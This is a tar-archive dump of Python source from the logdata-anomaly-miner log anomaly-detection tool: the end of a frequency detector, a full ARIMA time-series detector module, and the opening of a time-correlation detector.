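        reported_atom = self.max_frequency_log_atom[log_event]
        try:
            data = reported_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            data = repr(reported_atom.raw_data)
        if self.output_logline:
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
            sorted_log_lines = [reported_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data]
        else:
            sorted_log_lines = [data]
        analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(log_event)}
        frequency_info = {'ExpectedLogAtomValuesFrequencyRange': [0, self.set_upper_limit], 'LogAtomValuesFrequency': frequency,
                          'WindowSize': self.window_size}
        if not first_exceeded_threshold:
            # The confidence grows with the ratio by which the maximum exceeded the limit; frequency is > 0 for a recorded maximum.
            frequency_info['Confidence'] = 1 - self.set_upper_limit / frequency
            frequency_info['Local_maximum_timestamp'] = self.max_frequency_time[log_event]
        # In case that scoring_path_list is set, give their values to the event handlers for further analysis.
        if len(self.scoring_path_list) > 0:
            frequency_info['IdValues'] = list(self.scoring_value_list[log_event])[:self.max_frequency[log_event]]
        event_data = {'AnalysisComponent': analysis_component, 'FrequencyData': frequency_info}
        if first_exceeded_threshold:
            message = 'Frequency exceeds range for the first time'
        else:
            message = 'Frequency anomaly detected'
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, reported_atom, self)

    # skipcq: PYL-R0201, PYL-W0613
    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted. Nothing is persisted by this detector."""
        return False

    # skipcq: PYL-R0201
    def do_persist(self):
        """Immediately write persistence data to storage. Nothing is persisted by this detector."""
        return False

    def allowlist_event(self, event_type, event_data, allowlisting_data):  # skipcq: PYL-W0613
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. This detector
        allowlists nothing, so an exception is always raised.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            raise Exception('Event not from this source')
        raise Exception('No allowlisting for algorithm malfunction or configuration errors')

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        @param component_name the name of the component which is printed in the log line.
        Statistic levels 1 and 2 emit the same line here; the counters are reset after each call.
        """
        if AminerConfig.STAT_LEVEL in (1, 2):
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %s out of %s log atoms successfully in the last 60 minutes.", component_name, self.log_success,
                self.log_total)
        self.log_success = 0
        self.log_total = 0

    def reset_counter(self, log_atom, log_event):
        """
        Remove any times from counts, and the corresponding scoring values, that fell out of the time window.

        @param log_atom the current atom; its atom_time is the right edge of the window.
        @param log_event the event whose deques are trimmed.
        """
        cutoff = log_atom.atom_time - self.window_size
        timestamps = self.counts[log_event]
        scoring_values = self.scoring_value_list.get(log_event)
        while timestamps and timestamps[0] < cutoff:
            timestamps.popleft()
            # The scoring deque can be shorter than counts (an atom may lack the scoring path); an unguarded popleft() on an
            # exhausted deque would raise IndexError and take the detector down on ordinary input.
            if scoring_values:
                scoring_values.popleft()

    def get_current_frequency(self, log_atom, log_event):
        """Return the number of recorded atom_time values of log_event that lie within window_size of the current atom_time."""
        cutoff = log_atom.atom_time - self.window_size
        return sum(1 for timestamp in self.counts[log_event] if timestamp >= cutoff)

    def get_weight_analysis_field_path(self):
        """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler."""
        if self.scoring_path_list:
            return ['FrequencyData', 'IdValues']
        return []

    def get_weight_output_field_path(self):
        """Return the path where the ScoringEventHandler adds the scorings in the output of the detector."""
        if self.scoring_path_list:
            return ['FrequencyData', 'Scoring']
        return []
TSAArimaDetector.py000066400000000000000000001131661437606560100344300ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""
This module is a detector which uses a tsa-arima model to track appearance frequencies of events.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.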
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging import copy from aminer import AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX,\ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil import numpy as np from statsmodels.tsa.arima.model import ARIMA from statsmodels.tsa.stattools import acf from scipy.signal import savgol_filter class TSAArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class is used for an arima time series analysis of the appearances of log lines to events.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, waiting_time=1000, num_sections_waiting_time=100, acf_pause_interval_percentage=0.2, acf_auto_pause_interval=True, acf_auto_pause_interval_num_min=10, build_sum_over_values=False, num_periods_tsa_ini=15, num_division_time_step=10, alpha=0.05, num_min_time_history=20, num_max_time_history=30, num_results_bt=15, alpha_bt=0.05, acf_threshold=0.2, round_time_interval_threshold=0.02, force_period_length=False, set_period_length=604800, min_log_lines_per_time_step=10, persistence_id='Default', target_path_list=None, ignore_list=None, output_logline=True, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. 
This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of events in the time windows. @param acf_pause_interval_percentage states which area of the results of the ACF are not used to find the highest peak. @param acf_auto_pause_interval states if the pause area is automatically set. If enabled, the variable acf_pause_interval_percentage loses its functionality. @param acf_auto_pause_interval_num_min states the number of values in which a local minima must be the minimum, to be considered a local minimum of the function and not an outlier. @param build_sum_over_values states if the sum of a series of counts is build before applying the TSA. @param num_periods_tsa_ini number of periods used to initialize the Arima-model. @param num_division_time_step number of division of the time window to calculate the time step. @param alpha significance level of the estimated values. @param num_min_time_history number of lines processed before the period length is calculated. @param num_max_time_history maximum number of values of the time_history. @param num_results_bt number of results which are used in the binomial test. @param alpha_bt significance level for the bt test. @param round_time_interval_threshold threshold for the rounding of the time_steps to the times in self.assumed_time_steps. The higher the threshold the easier the time is rounded to the next time in the list. @param acf_threshold threshold, which has to be exceeded by the highest peak of the cdf function of the time series, to be analyzed. @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. @param set_period_length states how long the period length is if force_period_length is set to True. 
@param min_log_lines_per_time_step states the minimal average number of log lines per time step to make a TSA. @param persistence_id name of persistence file. @param target_path_list At least one of the parser paths in this list needs to appear in the event to be analyzed. @param waiting_time in seconds, until the time windows are being initialized. @param num_sections_waiting_time Number of sections of the initialization window. The length of the input-list of the calculate_time_steps is this number. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. 
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, acf_pause_interval_percentage=acf_pause_interval_percentage, acf_auto_pause_interval=acf_auto_pause_interval, acf_auto_pause_interval_num_min=acf_auto_pause_interval_num_min, build_sum_over_values=build_sum_over_values, num_periods_tsa_ini=num_periods_tsa_ini, num_division_time_step=num_division_time_step, alpha=alpha, num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history, num_results_bt=num_results_bt, alpha_bt=alpha_bt, acf_threshold=acf_threshold, round_time_interval_threshold=round_time_interval_threshold, force_period_length=force_period_length, set_period_length=set_period_length, min_log_lines_per_time_step=min_log_lines_per_time_step, waiting_time=waiting_time, num_sections_waiting_time=num_sections_waiting_time, persistence_id=persistence_id, target_path_list=target_path_list, ignore_list=ignore_list, output_logline=output_logline, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Add the TSAArimaDetector-module to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # List ot the time trigger. 
The first list states the times when something should be triggered, the second list states the indices # of the event types, or a list of the event type, a path and a value which should be counted (-1 for an initialization) # the third list states, the length of the time step (-1 for a one time trigger) self.time_trigger_list = [[], [], []] self.num_event_lines_ref = [] # Reference containing the number of lines of the events for the TSA self.time_window_history = [] # History of the time windows self.arima_models = [] # List of the single arima_models (statsmodels) self.prediction_history = [] # List of the observed values and the predictions of the TSAArima self.time_history = [] # List of the times of the observations self.result_list = [] # List of results if the value was in the limits of the one-step predictions # Minimal number of successes for the binomial test self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt) # Assumed occurring time steps in seconds. 1 minute: 60, 1 hour: 3600, 12 hours: 43200, 1 day: 86400, 1 week: 604800. 
self.assumed_time_steps = [60, 3600, 43200, 86400, 604800] # Load the persistence self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Import the persistence if persistence_data is not None: self.time_window_history = persistence_data[0] self.prediction_history = persistence_data[1] self.time_history = persistence_data[2] self.result_list = persistence_data[3] self.time_trigger_list = persistence_data[4] self.num_event_lines_ref = persistence_data[5] self.arima_models = [None for _ in self.time_window_history] # skipcq: PTC-W0060 for event_index in range(len(self.arima_models)): if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini*self.num_division_time_step: try: if not self.build_sum_over_values: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini*self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() else: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step+i: -(self.num_periods_tsa_ini-1)*self.num_division_time_step+i]) for i in range((self.num_periods_tsa_ini-1)*self.num_division_time_step)]+[ sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index] = None self.time_window_history[event_index] = [] else: self.arima_models[event_index] = None self.time_window_history[event_index] = [] # List of the pauses of the tests to the event numbers. 
If an arima model was initialized with the persistence, the model must # be trained before it can be used for forecasts. An integer states how many tests should be skipped before the next # output to this event number. None if no model was initialized for this event number. self.test_pause = [self.num_division_time_step if arima_models_statsmodel is not None else None for arima_models_statsmodel in self.arima_models] # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.time_trigger_list[0].append(-1) self.time_trigger_list[1].append(-1) self.time_trigger_list[2].append(-1) self.test_pause = None def receive_atom(self, log_atom): # skipcq: PYL-W0613, PYL-R0201 """ Receive the atom and return True. The log_atom doesn't need to be analyzed, because the counting and calls of the predictions is performed by the ETD. """ # Get current time if log_atom.atom_time is not None: current_time = log_atom.atom_time else: current_time = time.time() # Check if TSA should be initialized if -1 in self.time_trigger_list[0]: for i, val in enumerate(self.time_trigger_list[0]): if val == -1: # Initialize triggers for the time windows of the trainings phase for j in range(1, self.num_sections_waiting_time): self.time_trigger_list[0].append(current_time + self.waiting_time * j / ( self.num_sections_waiting_time)) self.time_trigger_list[1].append(-1) self.time_trigger_list[2].append(-1) self.time_trigger_list[0][i] = current_time + self.waiting_time # Save the current event lines count self.num_event_lines_ref = [[num] for num in self.event_type_detector.num_event_lines] break # Check if a trigger was triggered if len(self.time_trigger_list[0]) > 0 and any(current_time >= x for x in self.time_trigger_list[0]): # Get the indices of the triggered events indices = [i for i, time_trigger in enumerate(self.time_trigger_list[0]) if current_time >= time_trigger] # Execute the triggered functions of the TSA for i 
in range(len(indices)-1, -1, -1): # Checks if trigger is part of the initialisation if self.time_trigger_list[1][indices[i]] == -1 and self.time_trigger_list[2][indices[i]] == -1: # Save the number of occurred event types for the initialization of the TSA if self.num_event_lines_ref == [] or len( self.num_event_lines_ref[0]) < self.num_sections_waiting_time: # Expand the lists of self.num_event_lines_ref for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)): # skipcq: PTC-W0060 self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0])) # Add the current number of event lines for j, val in enumerate(self.event_type_detector.num_event_lines): self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j])) # Delete the initialization trigger del self.time_trigger_list[0][indices[i]] del self.time_trigger_list[1][indices[i]] del self.time_trigger_list[2][indices[i]] # Initialize the trigger for the time steps else: # Expand the lists of self.num_event_lines_ref for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)): # skipcq: PTC-W0060 self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0])) # Add the current number of eventlines for j, val in enumerate(self.event_type_detector.num_event_lines): self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j])) # skipcq: PTC-W0063 # Get the time step lengths. 
The first entry of the num_event_lines_ref states the number of log lines before the # initialization and is therefore excluded time_list = self.calculate_time_steps([val[1:] for val in self.num_event_lines_ref], log_atom) self.num_event_lines_ref = copy.copy(self.event_type_detector.num_event_lines) num_added_trigger = 0 # Add the new triggers for j, val in enumerate(time_list): if val != -1: num_added_trigger += 1 self.time_trigger_list[0].append(self.time_trigger_list[0][indices[i]] + val) self.time_trigger_list[1].append(j) self.time_trigger_list[2].append(val) # Delete the initialization trigger del self.time_trigger_list[0][indices[i]] del self.time_trigger_list[1][indices[i]] del self.time_trigger_list[2][indices[i]] # Run the update function for all trigger, which would already have been triggered for k in range(1, num_added_trigger+1): while current_time >= self.time_trigger_list[0][-k]: # skipcq: PTC-W0063 self.test_num_appearance(self.time_trigger_list[1][-k], self.event_type_detector.num_event_lines[ self.time_trigger_list[1][-k]] - self.num_event_lines_ref[ self.time_trigger_list[1][-k]], current_time, log_atom) self.time_trigger_list[0][-k] += self.time_trigger_list[2][-k] self.num_event_lines_ref[self.time_trigger_list[1][-k]] = self.event_type_detector.num_event_lines[ self.time_trigger_list[1][-k]] # Trigger for a reoccurring time step else: while current_time >= self.time_trigger_list[0][indices[i]]: # skipcq: PTC-W0063 self.test_num_appearance(self.time_trigger_list[1][indices[i]], self.event_type_detector.num_event_lines[ self.time_trigger_list[1][indices[i]]]-self.num_event_lines_ref[ self.time_trigger_list[1][indices[i]]], current_time, log_atom) self.time_trigger_list[0][indices[i]] += self.time_trigger_list[2][indices[i]] self.num_event_lines_ref[self.time_trigger_list[1][indices[i]]] = self.event_type_detector.num_event_lines[ self.time_trigger_list[1][indices[i]]] return True def do_timer(self, trigger_time): """Check if current ruleset 
should be persisted."""
    # A None next_persist_time means no persistence run has been scheduled yet; only the period is reported then.
    if self.next_persist_time is None:
        return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
    delta = self.next_persist_time - trigger_time
    if delta <= 0:
        # The period has elapsed: write the state now and schedule the next run one period from the wall clock.
        self.do_persist()
        delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        self.next_persist_time = time.time() + delta
    return delta

def do_persist(self):
    """
    Immediately write persistence data to storage.

    The stored JSON list holds, in this order: time_window_history, prediction_history, time_history,
    result_list, time_trigger_list and num_event_lines_ref. Any loader of this file has to keep that order.
    """
    persistence_data = [self.time_window_history, self.prediction_history, self.time_history, self.result_list,
                        self.time_trigger_list, self.num_event_lines_ref]
    PersistenceUtil.store_json(self.persistence_file_name, persistence_data)
    logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__)

def allowlist_event(self, event_type, sorted_log_lines, event_data, allowlisting_data):  # skipcq: PYL-W0613
    """
    Allowlist an event generated by this source using the information emitted when generating the event.

    @return a message with information about allowlisting
    @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
"""
    if event_type != f'Analysis.{self.__class__.__name__}':
        raise Exception('Event not from this source')
    # This detector supports no allowlisting at all; events of its own type are rejected as well.
    raise Exception('No allowlisting for algorithm malfunction or configuration errors')

def calculate_time_steps(self, counts, log_atom):
    """
    Returns a list of the timestep lengths in seconds, if no timestep should be created the value is set to -1.

    Calling this resets time_window_history, arima_models, prediction_history, time_history and result_list
    to one fresh entry per element of counts.
    @param counts one list of event counts per event type.
    @param log_atom the atom handed to self.print() together with the summary message.
    @return list with one time step per event type, -1 where no time step is created.
    """
    time_step_list = []  # List of the resulting time_steps
    self.time_window_history = [[] for _ in range(len(counts))]  # Initialize time_window_history
    self.arima_models = [None for _ in range(len(counts))]  # Initialize arima_models
    self.prediction_history = [[[], [], []] for _ in range(len(counts))]  # Initialize prediction_history
    self.time_history = [[] for _ in range(len(counts))]  # Initialize time_history
    self.result_list = [[1]*self.num_results_bt for _ in range(len(counts))]  # Initialize the lists of the results
    if self.force_period_length:
        # Force the period length
        time_step_list = [self.set_period_length / self.num_division_time_step for _ in counts]
    else:
        # Minimal size of the time step
        min_lag = max(int(self.acf_pause_interval_percentage*self.num_sections_waiting_time), 1)
        for event_index, data in enumerate(counts):
            # Event types matching none of the target paths, or any of the ignored paths, get no time step.
            if (self.target_path_list != [] and all(path not in self.event_type_detector.found_keys[
                    event_index] for path in self.target_path_list)) or (self.ignore_list != [] and any(
                    ignore_path in self.event_type_detector.found_keys[event_index] for ignore_path in self.ignore_list)):
                time_step_list.append(-1)
            else:
                # Apply the autocorrection function to the data of the single event types.
corr = list(map(abs, acf(data, nlags=len(data), fft=True))) corr = np.array(corr) # Apply the Savitzky-Golay-Filter to the list corr, to smooth the curve and get better results corrfit = savgol_filter(corr, min(max(3, int(len(corr)/100)-int(int(len(corr)/100) % 2 == 0)), 101), 1) # Set the pause area automatically if self.acf_auto_pause_interval: # Find the first local minima, which is the minimum in the last and next self.acf_auto_pause_interval_num_min values for i in range(self.acf_auto_pause_interval_num_min, len(corrfit)-self.acf_auto_pause_interval_num_min): if corrfit[i] == min(corrfit[i-self.acf_auto_pause_interval_num_min: i+self.acf_auto_pause_interval_num_min+1]): min_lag = i break # Find the highest peak and set the time-step as the index + lag highest_peak_index = np.argmax(corrfit[min_lag:]) if corrfit[min_lag + highest_peak_index] > self.acf_threshold: time_step_list.append((highest_peak_index + min_lag) / self.num_division_time_step * self.waiting_time / self.num_sections_waiting_time) else: time_step_list.append(-1) # Round the time_steps if they are similar to the times in self.assumed_time_steps for index, time_step in enumerate(time_step_list): if time_step != -1: for assumed_time_step in self.assumed_time_steps: if abs(assumed_time_step - time_step * self.num_division_time_step) / assumed_time_step <\ self.round_time_interval_threshold: time_step_list[index] = assumed_time_step / self.num_division_time_step break for index, time_step in enumerate(time_step_list): if time_step_list[index] != -1 and sum(counts[index]) / len(counts[index]) * time_step_list[index] /\ self.waiting_time * self.num_sections_waiting_time <\ self.min_log_lines_per_time_step: time_step_list[index] = -1 # Print a message of the length of the time steps message = f'Calculated the periods for the single event types in seconds: '\ f'{[time_step * self.num_division_time_step if time_step != -1 else "None" for time_step in time_step_list]}' affected_path = [] 
self.print(message, log_atom, affected_path) return time_step_list def test_num_appearance(self, event_index, count, current_time, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance""" if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Append the list of time_window_history and arima_models if it is to short if len(self.time_window_history) <= event_index: self.time_window_history += [[] for _ in range(event_index + 1 - len(self.time_window_history))] self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.prediction_history += [[[], [], []] for _ in range(event_index + 1 - len(self.prediction_history))] self.time_history += [[] for _ in range(event_index + 1 - len(self.time_history))] self.result_list += [[1]*self.num_results_bt for _ in range(event_index + 1 - len(self.result_list))] # Initialize the arima_model if needed if self.learn_mode and self.arima_models[event_index] is None: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) if len(self.time_window_history[event_index]) > 2 * self.num_periods_tsa_ini * self.num_division_time_step: self.time_window_history[event_index] = self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step:] # Check if enough values have been stored to initialize the arima_model if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini*self.num_division_time_step: message = f'Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)}' affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) if not self.build_sum_over_values: # 
Add the arima_model to the list try: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini*self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index] = None else: # Add the arima_model to the list try: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step+i: -(self.num_periods_tsa_ini-1)*self.num_division_time_step+i]) for i in range((self.num_periods_tsa_ini-1)*self.num_division_time_step)]+[ sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index] = None self.time_window_history[event_index] = [] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = current_time + self.stop_learning_no_anomaly_time # Add the new value and make a one-step prediction elif self.arima_models[event_index] is not None: if not self.build_sum_over_values: # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: self.prediction_history[event_index][0].append(0) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(0) self.time_history[event_index].append(current_time) else: self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(current_time) # Shorten the lists if necessary if 
len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: if self.test_pause[event_index] == 1: self.test_pause[event_index] = None # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.test_pause[event_index] -= 1 else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f'Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count}, '\ f'Upper: {upper_limit}' affected_path = self.event_type_detector.variable_key_list[event_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index].append(0) else: self.result_list[event_index].append(1) if len(self.result_list[event_index]) >= 2 * self.num_results_bt: self.result_list[event_index] = self.result_list[event_index][-self.num_results_bt:] # Discard or update the model, for the next step if self.learn_mode and sum(self.result_list[event_index][-self.num_results_bt:]) < self.bt_min_suc: message = f'Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)}' affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) # Discard the trained model and 
reset the result_list self.arima_models[event_index] = None self.result_list[event_index] = [1]*self.num_results_bt if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = current_time + self.stop_learning_no_anomaly_time else: # Update the model self.arima_models[event_index] = self.arima_models[event_index].append([count]) else: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) count_sum = sum(self.time_window_history[event_index][-self.num_division_time_step:]) # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count_sum) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(current_time) # Shorten the lists if necessary if len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] # Test if count_sum is in boundaries if count_sum < lower_limit or count_sum > upper_limit: message = f'Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count_sum}, '\ f'Upper: {upper_limit}' affected_path = self.event_type_detector.variable_key_list[event_index] confidence = 1 - min(count_sum / lower_limit, upper_limit / count_sum) self.print(message, log_atom, affected_path, confidence=confidence) # Update the model, for the next step self.arima_models[event_index] = 
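self.arima_models[event_index].append([count_sum])

def one_step_prediction(self, event_index):
    """
    Make a one step prediction with the Arima model.

    @param event_index index of the event type whose fitted model in self.arima_models is used.
    @return the tuple (lower_limit, upper_limit) of the forecast's confidence interval for self.alpha.
    """
    prediction = self.arima_models[event_index].get_forecast(1)
    prediction = prediction.conf_int(alpha=self.alpha)
    # return in the order: lower_limit, upper_limit
    return prediction[0][0], prediction[0][1]

def bt_min_successes(self, num_bt, p, alpha):  # skipcq: PYL-R0201
    """
    Calculate the minimal number of successes for the BT with significance alpha.

    p is the probability of success and num_bt is the number of observed tests.
    The cumulative binomial probability sum over j <= i of C(num_bt, j) * (1-p)^j * p^(num_bt-j) is accumulated
    for i = 0..num_bt; the first i at which it exceeds alpha is returned, num_bt if it never does.
    @param num_bt number of observed tests (non-negative int).
    @param p probability of success of a single test.
    @param alpha significance level the cumulative probability is compared against.
    @return the first index i at which the cumulative probability exceeds alpha, or num_bt.
    """
    tmp_sum = 0.0
    # Binomial coefficient C(num_bt, i), derived exactly in integer arithmetic from C(num_bt, i-1).
    # This avoids the np.math.factorial() quotient: the np.math alias is gone in NumPy 2 releases, and
    # float division of two large factorials loses precision long before the integer recurrence does.
    binomial = 1
    for i in range(num_bt + 1):
        if i > 0:
            binomial = binomial * (num_bt - i + 1) // i
        tmp_sum = tmp_sum + binomial * ((1 - p) ** i) * (p ** (num_bt - i))
        if tmp_sum > alpha:
            return i
    return num_bt

def print(self, message, log_atom, affected_path, confidence=None):
    """
    Print the message.

    Builds sorted_log_lines and event_data and forwards them to every registered anomaly event handler.
    @param message the text reported to the handlers.
    @param log_atom the atom the report refers to; its raw_data and, with output_logline, its parsed paths are included.
    @param affected_path a single path or a list of paths the report refers to.
    @param confidence optional confidence value placed into event_data['TypeInfo'].
    """
    if isinstance(affected_path, str):
        affected_path = [affected_path]
    original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
    if original_log_line_prefix is None:
        original_log_line_prefix = ''
    if self.output_logline:
        # All parsed paths of the atom are listed one per line in front of the prefixed raw line.
        tmp_str = ''
        for x in list(log_atom.parser_match.get_match_dictionary().keys()):
            tmp_str += ' ' + x + os.linesep
        tmp_str = tmp_str.lstrip(' ')
        sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode()]
        analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())}
    else:
        # Only the affected paths are listed; the configured prefix is not used in this form.
        tmp_str = ''
        for x in affected_path:
            tmp_str += ' ' + x + os.linesep
        tmp_str = tmp_str.lstrip(' ')
        sorted_log_lines = [tmp_str + log_atom.raw_data.decode()]
        analysis_component = {'AffectedLogAtomPaths': affected_path}
    if confidence is not None:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo':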
{'Confidence': confidence}} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {}} for listener in self.anomaly_event_handlers: # skipcq: PYL-C0209, FLK-E501 listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) TimeCorrelationDetector.py000066400000000000000000000341001437606560100361150ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for time correlation between atoms. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from datetime import datetime import random import time import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, 